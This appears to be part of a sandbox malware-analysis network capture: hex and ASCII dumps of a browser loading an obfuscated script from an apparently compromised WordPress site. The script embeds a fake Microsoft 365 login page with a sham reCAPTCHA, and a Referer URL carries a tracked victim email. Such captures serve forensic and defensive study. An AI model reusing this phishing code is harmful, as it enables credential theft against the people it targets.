                                                        2025-01-12 00:25:08 UTC841INData Raw: 26 28 65 3d 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6e 2e 68 6f 73 74 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 22 2f 22 3d 3d 3d 65 2e 63 68 61 72 41 74 28 30 29 26 26 28 65 3d 22 2f 22 3d 3d 3d 65 2e 63 68 61 72 41 74 28 31 29 3f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 65 3a 6e 2e 68 6f 73 74 2b 65 29 2c 2f 5e 28 68 74 74 70 73 3f 7c 77 73 73 3f 29 3a 5c 2f 5c 2f 2f 2e 74 65 73 74 28 65 29 7c 7c 28 65 3d 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 65 3a 22 68 74 74 70 73 3a 2f 2f 22 2b 65 29 2c 72 3d 76 65 28 65 29 29 2c 72 2e 70 6f 72 74 7c 7c 28 2f 5e 28 68 74 74 70 7c 77 73 29 24 2f 2e 74 65 73 74 28 72 2e 70 72 6f 74 6f 63 6f 6c 29 3f 72 2e 70 6f 72 74 3d 22 38 30 22 3a 2f 5e 28 68 74
                                                        Data Ascii: &(e=n.protocol+"//"+n.host),"string"==typeof e&&("/"===e.charAt(0)&&(e="/"===e.charAt(1)?n.protocol+e:n.host+e),/^(https?|wss?):\/\//.test(e)||(e=void 0!==n?n.protocol+"//"+e:"https://"+e),r=ve(e)),r.port||(/^(http|ws)$/.test(r.protocol)?r.port="80":/^(ht


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.64981172.167.84.164431444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-12 00:25:08 UTC349OUTGET /m/jsnom.js HTTP/1.1
                                                        Host: militarplus.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-01-12 00:25:08 UTC299INHTTP/1.1 200 OK
                                                        Date: Sun, 12 Jan 2025 00:25:08 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Last-Modified: Wed, 11 Dec 2024 03:04:40 GMT
                                                        ETag: "1002a2-18781-628f5dbda9819"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 100225
                                                        Vary: Accept-Encoding
                                                        Content-Type: text/javascript
                                                        2025-01-12 00:25:08 UTC7893INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 39 65 62 30 35 20 3d 20 5f 30 78 35 39 65 62 28 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 66 61 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 61 65 35 39 2c 20 5f 30 78 33 39 31 66 64 35 29 20 7b 20 5f 30 78 31 66 61 65 35 39 20 3d 20 5f 30 78 31 66 61 65 35 39 20 2d 20 30 78 65 61 3b 20 6c 65 74 20 5f 30 78 63 62 63 31 36 39 20 3d 20 5f 30 78 35 39 65 62 30 35 5b 5f 30 78 31 66 61 65 35 39 5d 3b 20 72 65 74 75 72 6e 20 5f 30 78 63 62 63 31 36 39 3b 20 7d 2c 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 3b 20 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33
                                                        Data Ascii: function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3
                                                        2025-01-12 00:25:08 UTC8000INData Raw: 74 69 6f 6e 3a 5c 78 32 30 61 62 73 6f 6c 75 74 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 74 6f 70 3a 5c 78 32 30 30 25 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30
                                                        Data Ascii: tion:\x20absolute;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-left:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-right:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-top:\x200%;\x0a\x20\x20\x20
                                                        2025-01-12 00:25:08 UTC8000INData Raw: 5c 78 32 30 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 70 70 65 61 72 61 6e 63 65 3a 5c 78 32 30 74 65 78 74 66 69 65 6c 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 2d 69 6e 74 65 72 6e 61 6c 2d 6c 69 67 68 74 2d 64 61 72 6b 28 72 67 62 28 32 35 35 2c 5c 78 32 30 32 35 35 2c 5c 78 32 30 32 35 35 29 2c 5c
                                                        Data Ascii: \x20letter-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20word-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20appearance:\x20textfield;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20-internal-light-dark(rgb(255,\x20255,\x20255),\
                                                        2025-01-12 00:25:08 UTC8000INData Raw: 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 68 72 69 6e 6b 6d 65 6e 75 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6e 65 77 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30
                                                        Data Ascii: a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.shrinkmenu1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.new1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20
                                                        2025-01-12 00:25:08 UTC8000INData Raw: 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 6e 69 6d 61 74 69 6f 6e 3a 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 3a 61 66 74 65 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c
                                                        Data Ascii: s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20\x20\x20\x20\x20animation:\x20dot-floating-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.dot-floating::after\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20l
                                                        2025-01-12 00:25:08 UTC8000INData Raw: 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 68 65 63 6b 62 6f 78 2d 77 72 61 70 70 65 72 2d 34 33 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5d 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 76 69 73 69 62 69 6c 69 74 79 3a 5c 78 32 30 68 69 64 64 65 6e 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 68 65 63 6b 62 6f
                                                        Data Ascii: 0a\x20\x20\x20\x20.checkbox-wrapper-43\x20input[type=\x22checkbox\x22]\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20\x20\x20\x20\x20visibility:\x20hidden;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.checkbo
                                                        2025-01-12 00:25:08 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 62 6c 6f 63 6b 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 3e 69 6d 67 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 3a 5c 78 32 30 31 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                                        Data Ascii: \x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20display:\x20block;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.sideBar>img\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x2010px;\x0a\x20\x20\x20\x20\x20\x20\x2
                                                        2025-01-12 00:25:08 UTC8000INData Raw: 32 5c 78 32 30 72 6f 6c 65 3d 5c 78 32 32 70 72 65 73 65 6e 74 61 74 69 6f 6e 5c 78 32 32 5c 78 32 30 70 6e 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 37 63 63 30 39 36 64 61 36 61 61 32 64 62 61 33 66 38 31 66 63 63 31 63 38 32 36 32 31 35 37 63 2e 70 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38
                                                        Data Ascii: 2\x20role=\x22presentation\x22\x20pngsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png\x22\x20svgsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8
                                                        2025-01-12 00:25:08 UTC8000INData Raw: 5c 78 32 32 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 61 74 61 2d 62 69 6e 64 3d 5c 78 32 32 69 6d 67 53 72 63 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                        Data Ascii: \x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20data-bind=\x22imgSrc\x22\x20src=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22>\x0a\x20\x20\x20\x20\x20\
                                                        2025-01-12 00:25:08 UTC8000INData Raw: 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 3c 69 6e 70 75 74 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5c 78 32 32 3e 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 73 75 62 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32
                                                        Data Ascii: x20\x20\x20\x20\x20\x20...\x20<input\x20class=\x22recaptchacheckbox\x22\x20type=\x22checkbox\x22\x20name=\x22\x22\x20id=\x22\x22>\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22recaptchasub\x22>\x0a\x20\x20\x2


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.64982472.167.84.164431444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-12 00:25:08 UTC682OUTGET /favicon.ico HTTP/1.1
                                                        Host: militarplus.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.co
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-01-12 00:25:09 UTC438INHTTP/1.1 302 Found
                                                        Date: Sun, 12 Jan 2025 00:25:09 GMT
                                                        Server: Apache
                                                        X-Powered-By: PHP/8.1.31
                                                        Link: <https://militarplus.com/wp-json/>; rel="https://api.w.org/"
                                                        X-Redirect-By: WordPress
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Location: https://militarplus.com/wp-content/uploads/2023/01/cropped-AF-Logo-Militar-Plus-04-1-32x32.webp
                                                        Vary: Accept-Encoding
                                                        Transfer-Encoding: chunked
                                                        Content-Type: text/html; charset=UTF-8
                                                        2025-01-12 00:25:09 UTC83INData Raw: 34 38 0d 0a 3c 73 63 72 69 70 74 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 48<script></script><script></script><script></script><script></script>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.64981518.245.31.784431444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-12 00:25:09 UTC359OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                                        Host: cdn.socket.io
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-01-12 00:25:09 UTC703INHTTP/1.1 200 OK
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Content-Length: 49993
                                                        Connection: close
                                                        Accept-Ranges: bytes
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=31536000, immutable
                                                        Content-Disposition: inline; filename="socket.io.min.js"
                                                        Date: Sat, 03 Aug 2024 07:26:50 GMT
                                                        ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                                        Server: Vercel
                                                        Strict-Transport-Security: max-age=63072000
                                                        X-Vercel-Cache: HIT
                                                        X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                                                        X-Cache: Hit from cloudfront
                                                        Via: 1.1 b7c8b552077b93dc0acaa0b82d11fa62.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: FRA56-P8
                                                        X-Amz-Cf-Id: w5yXJ_OKndFyrkfOIFK0_d9M5q87_j5TnsWT1eyKXjFQG4vNovcxiA==
                                                        Age: 14348900
                                                        2025-01-12 00:25:09 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                        Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                                        2025-01-12 00:25:09 UTC16384INData Raw: 66 20 64 6f 63 75 6d 65 6e 74 29 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 74 74 61 63 68 45 76 65 6e 74 29 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 61 65 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 7b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 6e 70 61 67 65 68 69 64 65 22 69 6e 20 49 3f 22 70 61 67 65 68 69 64 65 22 3a 22 75 6e 6c 6f 61 64 22 2c 61 65 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 61 65 28 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 73 65 2e 72 65 71 75 65 73 74 73 29 73 65 2e 72 65 71 75 65 73 74 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 26 26 73 65 2e 72 65 71 75
                                                        Data Ascii: f document)if("function"==typeof attachEvent)attachEvent("onunload",ae);else if("function"==typeof addEventListener){addEventListener("onpagehide"in I?"pagehide":"unload",ae,!1)}function ae(){for(var e in se.requests)se.requests.hasOwnProperty(e)&&se.requ
                                                        2025-01-12 00:25:09 UTC15202INData Raw: 74 61 20 77 68 65 6e 20 72 65 63 6f 6e 73 74 72 75 63 74 69 6e 67 20 61 20 70 61 63 6b 65 74 22 29 3b 76 61 72 20 6e 3d 28 74 3d 74 68 69 73 2e 64 65 63 6f 64 65 53 74 72 69 6e 67 28 65 29 29 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 3b 6e 7c 7c 74 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 3f 28 74 2e 74 79 70 65 3d 6e 3f 42 65 2e 45 56 45 4e 54 3a 42 65 2e 41 43 4b 2c 74 68 69 73 2e 72 65 63 6f 6e 73 74 72 75 63 74 6f 72 3d 6e 65 77 20 50 65 28 74 29 2c 30 3d 3d 3d 74 2e 61 74 74 61 63 68 6d 65 6e 74 73 26 26 70 28 73 28 69 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 65 6d 69 74 52 65 73 65 72 76 65 64 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 2c 22 64 65 63 6f 64 65 64 22 2c 74 29 29 3a 70 28 73 28 69
                                                        Data Ascii: ta when reconstructing a packet");var n=(t=this.decodeString(e)).type===Be.BINARY_EVENT;n||t.type===Be.BINARY_ACK?(t.type=n?Be.EVENT:Be.ACK,this.reconstructor=new Pe(t),0===t.attachments&&p(s(i.prototype),"emitReserved",this).call(this,"decoded",t)):p(s(i
                                                        2025-01-12 00:25:09 UTC2023INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 29 2c 74 68 69 73 2e 62 61 63 6b 6f 66 66 2e 72 65 73 65 74 28 29 2c 74 68 69 73 2e 5f 72 65 61 64 79 53 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 2c 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 63 6c 6f 73 65 22 2c 65 2c 74 29 2c 74 68 69 73 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6f 6e 26 26 21 74 68 69 73 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 26 26 74 68 69 73 2e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 7d 2c 7b 6b 65 79 3a 22 72 65 63 6f 6e 6e 65 63 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 69 66 28 74 68 69 73 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 7c 7c 74 68 69 73 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 29 72
                                                        Data Ascii: function(e,t){this.cleanup(),this.backoff.reset(),this._readyState="closed",this.emitReserved("close",e,t),this._reconnection&&!this.skipReconnect&&this.reconnect()}},{key:"reconnect",value:function(){var e=this;if(this._reconnecting||this.skipReconnect)r


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.649816192.229.133.2214431444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-12 00:25:09 UTC544OUTGET /w3css/4/w3.css HTTP/1.1
                                                        Host: www.w3schools.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://militarplus.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-01-12 00:25:09 UTC576INHTTP/1.1 200 OK
                                                        Age: 101006
                                                        Cache-Control: public,max-age=31536000,public
                                                        Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                        Content-Type: text/css
